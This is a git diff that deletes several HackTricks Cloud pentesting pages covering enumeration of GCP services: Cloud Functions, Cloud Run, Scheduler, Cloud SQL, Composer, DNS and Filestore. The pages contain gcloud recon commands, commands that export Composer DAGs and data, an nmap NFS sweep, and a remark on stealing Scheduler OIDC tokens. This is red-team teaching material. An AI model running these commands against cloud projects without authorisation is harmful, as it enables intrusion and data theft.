- -### Inside the Cloud Function - -The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\ -The disk **isn't mounted as read-only.** - -### Enumeration - -```bash -# List functions -gcloud functions list -gcloud functions describe # Check triggers to see how is this function invoked -gcloud functions get-iam-policy - -# Get logs of previous runs. By default, limits to 10 lines -gcloud functions logs read --limit [NUMBER] - -# Call a function -curl https://-.cloudfunctions.net/ -gcloud functions call --data='{"message": "Hello World!"}' - -# If you know the name of projects you could try to BF cloud functions names - -# Get events that could be used to trigger a cloud function -gcloud functions event-types list - -# Access function with authentication -curl -X POST https://-.cloudfunctions.net/ \ --H "Authorization: bearer $(gcloud auth print-identity-token)" \ --H "Content-Type: application/json" \ --d '{}' -``` - -### Privilege Escalation - -In the following page, you can check how to **abuse cloud function permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md" %} -[gcp-cloudfunctions-privesc.md](../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md" %} -[gcp-cloud-functions-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md" %} -[gcp-cloud-functions-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-functions-persistence.md" %} -[gcp-cloud-functions-persistence.md](../gcp-persistence/gcp-cloud-functions-persistence.md) -{% endcontent-ref %} - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md deleted file mode 100644 index 82989eafc..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md +++ /dev/null @@ -1,137 +0,0 @@ -# GCP - Cloud Run Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure. - -You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.** - -Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications. - -### Services and jobs - -On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud. - -* **Cloud Run services.** Used to run code that responds to web requests, or events. -* **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done. - -## Cloud Run Service - -Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response. - -### Relevant details - -* By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\ - Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**. -* By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**. -* By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.** -* It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.** -* It's also possible to **add connections with Cloud SQL** and **mount a file system.** -* The **URLs** of the services deployed are similar to **`https://-.a.run.app`** -* A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions. - -### Enumeration - -```bash -# List services -gcloud run services list -gcloud run services list --platform=managed -gcloud run services list --platform=gke - -# Get info of a service -gcloud run services describe --region - -# Get info of all the services together -gcloud run services list --format=yaml -gcloud run services list --platform=managed --format=json -gcloud run services list --platform=gke --format=json - -# Get policy -gcloud run services get-iam-policy --region - -# Get revisions -gcloud run revisions list --region -gcloud run revisions describe --region - -# Get domains -gcloud run domain-mappings list -gcloud run domain-mappings describe - -# Attempt to trigger a job unauthenticated -curl - -# Attempt to trigger a job with your current gcloud authorization -curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" -``` - -## Cloud Run Jobs - -Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done. - -### Enumeration - -```bash -gcloud beta run jobs list -gcloud beta run jobs describe --region -gcloud beta run jobs get-iam-policy --region -``` - -## Privilege Escalation - -In the following page, you can check how to **abuse cloud run permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-run-privesc.md" %} -[gcp-run-privesc.md](../gcp-privilege-escalation/gcp-run-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md" %} -[gcp-cloud-run-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md" %} -[gcp-cloud-run-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-run-persistence.md" %} -[gcp-cloud-run-persistence.md](../gcp-persistence/gcp-cloud-run-persistence.md) -{% endcontent-ref %} - -## References - -* [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md deleted file mode 100644 index 1614bc5d2..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md +++ /dev/null @@ -1,73 +0,0 @@ -# GCP - Cloud Scheduler Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**. - -Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code. - -At the moment of this writing these are the actions this service allows to schedule: - -
- -* **HTTP**: Send an HTTP request defining the headers and body of the request. -* **Pub/Sub**: Send a message into an specific topic -* **App Engine HTTP**: Send an HTTP request to an app built in App Engine -* **Workflows**: Call a GCP Workflow. - -## Service Accounts - -A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\ -Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request. - -{% hint style="danger" %} -Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page. -{% endhint %} - -Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`. - -## Enumeration - -```bash -# Get schedulers in a location -gcloud scheduler jobs list --location us-central1 - -# Get information of an specific scheduler -gcloud scheduler jobs describe --location us-central1 -``` - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %} -[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md deleted file mode 100644 index d03e8b288..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md +++ /dev/null @@ -1,54 +0,0 @@ -# GCP - Cloud Shell Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\ -Moreover, its offered at **no additional cost.** - -**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization. - -There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**. - -Note that Cloud Shell can be **easily disabled** for the organization. - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md" %} -[gcp-cloud-shell-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-shell-persistence.md" %} -[gcp-cloud-shell-persistence.md](../gcp-persistence/gcp-cloud-shell-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md deleted file mode 100644 index ee69ced5a..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Cloud SQL Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups. - -Key features of Google Cloud SQL include: - -1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration. -2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime. -3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures. -4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC. -5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data. -6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications. -7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance. - -### Password - -In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":** - -
- -It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default. - -**SQL Server** can be configured with **Active Directory Authentication**. - -### Zone Availability - -The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones. - -### Encryption - -By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**. - -### Connections - -* **Private IP**: Indicate the VPC network and the database will get an private IP inside the network -* **Public IP**: The database will get a public IP, but by default no-one will be able to connect - * **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database -* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it** - -
- -### Data Protection - -* **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain. -* **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second. -* **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled - -### Enumeration - -```bash -# Get SQL instances -gcloud sql instances list -gcloud sql instances describe # get IPs, CACert, settings - -# Get database names inside an instance (like information_schema, sys...) -gcloud sql databases list --instance -gcloud sql databases describe --instance - -# Get usernames inside the db instance -gcloud sql users list --instance - -# Backups -gcloud sql backups list --instance -gcloud sql backups describe --instance -``` - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md" %} -[gcp-cloud-sql-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-sql-persistence.md" %} -[gcp-cloud-sql-persistence.md](../gcp-persistence/gcp-cloud-sql-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md deleted file mode 100644 index f238feb32..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md +++ /dev/null @@ -1,71 +0,0 @@ -# GCP - Composer Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks. - -### Enumeration - -{% code overflow="wrap" %} -```bash -# Get envs info -gcloud composer environments list --locations -gcloud composer environments describe --location - -# Get list of dags -gcloud composer environments storage dags list --environment --location -# Download dags code -mkdir /tmp/dags -gcloud composer environments storage dags export --environment --location --destination /tmp/dags - -# List Data from composer -gcloud composer environments storage data list --environment --location -# Download data -mkdir /tmp/data -gcloud composer environments storage data export --environment --location --destination /tmp/data - -# List Plugins from composer -gcloud composer environments storage plugins list --environment --location -# Download plugins -mkdir /tmp/plugins -gcloud composer environments storage data export --environment --location --destination /tmp/plugins -``` -{% endcode %} - -### Privesc - -In the following page you can check how to **abuse composer permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %} -[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md deleted file mode 100644 index 136c2dcce..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md +++ /dev/null @@ -1,51 +0,0 @@ -# GCP - DNS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCP - Cloud DNS - -Google Cloud DNS is a high-performance, resilient, global Domain Name System (DNS) service. - -```bash -# This will usually error if DNS service isn't configured in the project -gcloud dns project-info describe - -# Get DNS zones & records -gcloud dns managed-zones list -gcloud dns managed-zones describe -gcloud dns record-sets list --zone # Get record of the zone - -# Policies -## A response policy is a collection of selectors that apply to queries made against one or more virtual private cloud networks. -gcloud dns response-policies list -## DNS policies control internal DNS server settings. You can apply policies to DNS servers on Google Cloud Platform VPC networks you have access to. -gcloud dns policies list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md deleted file mode 100644 index d60c12b00..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md +++ /dev/null @@ -1,105 +0,0 @@ -# GCP - Filestore Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Filestore is a **managed file storage service** tailored for applications in need of both a **filesystem interface and a shared filesystem for data**. This service excels by offering high-performance file shares, which can be integrated with various GCP services. Its utility shines in scenarios where traditional file system interfaces and semantics are crucial, such as in media processing, content management, and the backup of databases. - -You can think of this like any other **NFS** **shared document repository -** a potential source of sensitive info. - -### Connections - -When creating a Filestore instance it's possible to **select the network where it's going to be accessible**. - -Moreover, by **default all clients on the selected VPC network and region are going to be able to access it**, however, it's possible to **restrict the access also by IP address** or range and indicate the access privilege (Admin, Admin Viewer, Editor, Viewer) user the client is going to get **depending on the IP address.** - -It can also be accessible via a **Private Service Access Connection:** - -* Are per VPC network and can be used across all managed services such as Memorystore, Tensorflow and SQL. -* Are **between your VPC network and network owned by Google using a VPC peering**, enabling your instances and services to communicate exclusively by **using internal IP addresses**. -* Create an isolated project for you on the service-producer side, meaning no other customers share it. You will be billed for only the resources you provision. -* The VPC peering will import new routes to your VPC - -### Backups - -It's possible to create **backups of the File shares**. These can be later **restored in the origin** new Fileshare instance or in **new ones**. - -### Encryption - -By default a **Google-managed encryption key** will be used to encrypt the data, but it's possible to select a **Customer-managed encryption key (CMEK)**. - -### Enumeration - -If you find a filestore available in the project, you can **mount it** from within your compromised Compute Instance. Use the following command to see if any exist. - -{% code overflow="wrap" %} -```bash -# Instances -gcloud filestore instances list # Check the IP address -gcloud filestore instances describe --zone # Check IP and access restrictions - -# Backups -gcloud filestore backups list -gcloud filestore backups describe --region - -# Search for NFS shares in a VPC subnet -sudo nmap -n -T5 -Pn -p 2049 --min-parallelism 100 --min-rate 1000 --open 10.99.160.2/20 -``` -{% endcode %} - -{% hint style="danger" %} -Note that a filestore service might be in a **completely new subnetwork created for it** (inside a Private Service Access Connection, which is a **VPC peer**).\ -So you might need to **enumerate VPC peers** to also run nmap over those network ranges. - -{% code overflow="wrap" %} -```bash -# Get peerings -gcloud compute networks peerings list -# Get routes imported from a peering -gcloud compute networks peerings list-routes --network= --region= --direction=INCOMING -``` -{% endcode %} -{% endhint %} - -### Privilege Escalation & Post Exploitation - -There aren't ways to escalate privileges in GCP directly abusing this service, but using some **Post Exploitation tricks it's possible to get access to the data** and maybe you can find some credentials to escalate privileges: - -{% content-ref url="../gcp-post-exploitation/gcp-filestore-post-exploitation.md" %} -[gcp-filestore-post-exploitation.md](../gcp-post-exploitation/gcp-filestore-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-filestore-persistence.md" %} -[gcp-filestore-persistence.md](../gcp-persistence/gcp-filestore-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
